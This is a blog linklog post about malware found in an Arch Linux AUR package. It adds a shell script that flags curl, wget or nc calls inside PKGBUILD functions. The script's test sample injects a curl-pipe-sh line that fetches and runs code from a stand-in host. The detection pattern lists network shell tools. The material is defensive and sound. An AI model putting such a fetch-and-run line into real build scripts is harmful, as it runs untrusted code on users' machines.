Always read your PKGBUILDs

If you don’t read the PKGBUILD file whenever you download something from the AUR repositories, you are exposing yourself to terrible security issues, as the world has recently seen.

Malware was spotted in the AUR repositories of Arch Linux last week. Someone modified the PKGBUILD of a package to add a curl call to the script, as can be seen here (the commit was stripped out of the history, so the link only works as long as the blob object is not purged from the repository).

I would file this tip in the same category as “don’t just curl-pipe-bash stuff you find on GitHub”, but it’s getting late and I don’t have time to enter the rabbit-hole argument of where we put the limit on trusting the software and the installers we put on our machines.
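As an added example (not code from the original post), here is a small POSIX shell check to run before `makepkg`: makepkg verifies checksums for the `source=()` array, but a curl call placed inside a PKGBUILD function body runs unchecked, which is exactly where the tampered package hid it. The function names and the sample PKGBUILDs below are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post. Lists network-client calls
# (curl/wget/nc/ncat) inside PKGBUILD function bodies such as prepare(),
# build(), package() or pkgver(); checksums only cover source=(), not these.
# scan_pkgbuild/write_samples and the sample PKGBUILDs are constructed here.

# Print "<line>: <text>" for each function-body line that invokes a network
# client. Returns 0 when nothing was found, 1 otherwise.
scan_pkgbuild() {
    hits=$(awk '
        # a line like "build() {" or "package_foo() {" opens a function body
        /^[ \t]*[A-Za-z_][A-Za-z0-9_-]*[ \t]*\(\)[ \t]*[{]/ { infn = 1; next }
        # a "}" at column 0 closes it
        infn && /^[}]/ { infn = 0; next }
        infn {
            code = $0
            sub(/#.*/, "", code)          # ignore trailing comments
            if (code ~ /(^|[^A-Za-z0-9_])(curl|wget|nc|ncat)([^A-Za-z0-9_]|$)/)
                printf "%d: %s\n", NR, $0
        }' "$1")
    [ -z "$hits" ] && return 0
    printf 'network call inside a PKGBUILD function (%s):\n%s\n' "$1" "$hits" >&2
    return 1
}

# Write a clean (constructed) PKGBUILD to $1 and a tampered copy, with a
# curl-pipe-sh line injected into build(), to $2.
write_samples() {
    cat > "$1" <<'EOF'
pkgname=example
pkgver=1.0
pkgrel=1
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  make DESTDIR="$pkgdir" install
}
EOF
    awk '/^  make$/ { print "  curl -s https://example.invalid/x | sh" } { print }' "$1" > "$2"
}

clean=$(mktemp); tampered=$(mktemp)
write_samples "$clean" "$tampered"
scan_pkgbuild "$clean" && echo "clean PKGBUILD: no network calls in functions"
scan_pkgbuild "$tampered" || echo "tampered PKGBUILD flagged, do not run makepkg"
rm -f "$clean" "$tampered"
```

Run it against the real PKGBUILD in the cloned AUR directory with `scan_pkgbuild ./PKGBUILD`; a hit is a reason to read the file in full, not a verdict, since legitimate `pkgver()` functions sometimes fetch too.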

Footnote disclaimer: This is the internal permalink for an item shared in my linklog. The actual resource can be viewed by clicking on the link at the post title. The linklog is curated with links I find online or in my sources that I want to collect as a reference for later or to share with people who may find them interesting. The intention is solely informative and I cannot guarantee the exactness of the linked content.